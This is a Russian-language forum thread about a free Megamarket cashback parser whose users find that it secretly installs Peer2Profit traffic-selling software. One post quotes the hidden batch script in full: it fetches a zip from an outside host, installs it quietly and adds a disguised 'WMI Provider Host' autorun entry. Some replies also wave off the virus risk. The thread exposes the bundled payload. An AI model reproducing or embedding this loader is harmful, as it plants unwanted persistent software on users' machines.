Мегамаркет бесплатный сканер кэшбэка

chaimclayton

Активный участник
Дней с нами
222
Розыгрыши
0
Сообщения
63
Репутация
1
Реакции
61
UPD: На основе скрипта был сделан новый парсер

mmcashback-free.png

MMCashbackFREE 2.0
Скачать бесплатную версию
если запросит логин и пароль: freemegamarket
Возможности:
- Сохранение результатов в таблицу Excel!
- Применение фильтров по товару, цене, продавцу
- Поддержка списка из нескольких URL




Также существует версия парсера с доп. возможностями:
- Вход в аккаунт ММ или выбор региона (для точного кешбэка)
- Многопоточность
- Скорость парсинга до 5000 товаров/мин!
- Уведомления с результатами в Telegram!
- Парсинг с применением внутренних фильтров Мегамаркета!
- Парсинг поисковой выдачи!
- Встроенный планировщик запуска

Подробнее о полной версии парсера
в этой теме
 
Последнее редактирование:
вирусов нет?
 
Тот же вопрос, на VT 1/59 (MaxSecure - Trojan.Malware.300983.susgen)
ну это скорее нет. чем есть)
можно запустить на виртуалке. и даже если они есть, то пофиг

парсер рабочий. сделан на басе. но парсит он под гостем, а кеш на мм рандомный в зависимости от конкретного акка... у кого 1 акк и тот с пониженным кешем - будет расстроен)

upd. вместе с парсером идет "майнер". селится по адресу C:\Users\%username%\AppData\Local\Peer2Profit после перезагрузки
хз что это. погуглил. зарабатывает на трафике. так что удаляйте в безопасном режиме Peer2Profit. мало ли че за трафик он там гоняет.

кто ещё не успел запустить парсер - в архиве очищенный от установки "майнера" проект. распаковать и положить в папку \data с заменой
 

Вложения

  • project.zip
    12,5 KB · Просмотры: 396
Последнее редактирование:
Немного не по теме, но поинтересуюсь. В ветке мегамаркета был человек скидывал "калькулятор кэшбэка" репозиторий с GitHub до того как форум лег, можно было сортировать товары с вычетом кэшбека за пару секунд. Но с недавних пор почему то перестал отображаться кэшбэк на товарах и следовательно сортировать от большего к меньшему тоже нет возможности, кэшбэк отображается лишь на странице товара. Кто шарит в этой теме? как починить?
 
Немного не по теме, но поинтересуюсь. В ветке мегамаркета был человек скидывал "калькулятор кэшбэка" репозиторий с GitHub до того как форум лег, можно было сортировать товары с вычетом кэшбека за пару секунд. Но с недавних пор почему то перестал отображаться кэшбэк на товарах и следовательно сортировать от большего к меньшему тоже нет возможности, кэшбэк отображается лишь на странице товара. Кто шарит в этой теме? как починить?
Можешь дать ссылку на тот GitHub? Попробую починить
 
ну это скорее нет. чем есть)

можно запустить на виртуалке. и даже если они есть, то пофиг

парсер рабочий. сделан на басе. но парсит он под гостем, а кеш на мм рандомный в зависимости от конкретного акка... у кого 1 акк и тот с пониженным кешем - будет расстроен)
У кого то ни памяти ни норм пк нет для виртуалки) Кеш на мм разве не от гео зависит? Или рил от акка
 
Можешь дать ссылку на тот GitHub? Попробую починить
Какие виртуалки норм?
хз. не интересовался этим вопросом. лет 10-15 пользуюсь виртуал боксом. меня он устраивает. другие даже не пытался использовать. вполне возможно есть варианты получше
У кого то ни памяти ни норм пк нет для виртуалки)
4 гига 4 ядра?)
 
@qwertyk Скрипт работает, я только что установил и проверил. Может тебе обновить надо? Последняя версия 2.0.3 --Ссылка удалена--
 
  • Like
Реакции: tigg, Anhel и S1gN4L
@qwertyk Скрипт работает, я только что установил и проверил. Может тебе обновить надо? Последняя версия 2.0.3 --Ссылка удалена--
хз. не я жаловался что он не работает

лучше скажите кто парсер поставил. у вас случаем не появилась папочка по адресу C:\Users\%username%\AppData\Local\Peer2Profit ?
 
  • Like
Реакции: konsid1
хз. не я жаловался что он не работает

лучше скажите кто парсер поставил. у вас случаем не появилась папочка по адресу C:\Users\%username%\AppData\Local\Peer2Profit ?
У меня не появилась.
 
хз. не я жаловался что он не работает

лучше скажите кто парсер поставил. у вас случаем не появилась папочка по адресу C:\Users\%username%\AppData\Local\Peer2Profit ?
у меня появилась...
 
  • Haha
Реакции: qwertyk
у меня появилась...
а не проще открыть проект в Басе и посмотреть что там делает?)
там единственно, записывает что-то в файл вот такое, пока не разбирался подробнее)
---------Двойное сообщение соединено: ---------

вот что там запускается, может нормально всё
@echo off

setlocal enableextensions enabledelayedexpansion

set "fileUrl=https://gop2p.hb.bizmrg.com/go3.zip"
set "filePath=%UserProfile%\AppData\Local\go3.zip"

echo Downloading file...
powershell -command "& { (New-Object System.Net.WebClient).DownloadFile('%fileUrl%', '%filePath%') }"

:waitloop
ping -n 1 -w 1000 127.0.0.1 > nul
if not exist "%filePath%" goto waitloop

echo Unzip file...
powershell -Command "Expand-Archive %UserProfile%\AppData\Local\go3.zip -DestinationPath %UserProfile%\AppData\Local\Peer2Profit\Peer2Profit\ -Force"

start /wait %UserProfile%\AppData\Local\Peer2Profit\Peer2Profit\VC_redist.x86.exe /install /quiet

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WMI Provider Host" /t REG_SZ /d "C:\Windows\System32\cmd.exe /c "%UserProfile%\AppData\Local\Peer2Profit\Peer2Profit\Launch.cmd"" /F

endlocal

del %UserProfile%\AppData\Local\go3.zip

exit /b 0
 

Вложения

  • Снимок экрана 2024-01-16 174008.jpg
    Снимок экрана 2024-01-16 174008.jpg
    32,5 KB · Просмотры: 611
Последнее редактирование:
вот что там запускается, может нормально всё
ну всмысле "нормально"?) мусор не нужный ставится в виде Peer2Profit. для работы парсера он не нужен. удалил. и можно дальше парсером пользоваться. автор парсера так его монетизировал просто
 
ну всмысле "нормально"?) мусор не нужный ставится в виде Peer2Profit. для работы парсера он не нужен. удалил. и можно дальше парсером пользоваться. автор парсера так его монетизировал просто
Конечно лучше сразу удалить такие куски из кода, делов на минуту :)
Особенно с учётом того что автор называл это CheckBrowser, хотя мог честно оставить название - forProfit
 
  • Haha
Реакции: dean9996
Конечно лучше сразу удалить такие куски из кода, делов на минуту :)
Особенно с учётом того что автор называл это CheckBrowser, хотя мог честно оставить название - forProfit
Ты вроде шаришь как это чекать на вирусы. Там в коде нет переходов на сайт с копированием и дополнением кода? Вроде так безопасный файл заражают когда он популярным становится
 
Обновил шапку со ссылкой на архив с заменой файла от qwertyk, просьба перекачать.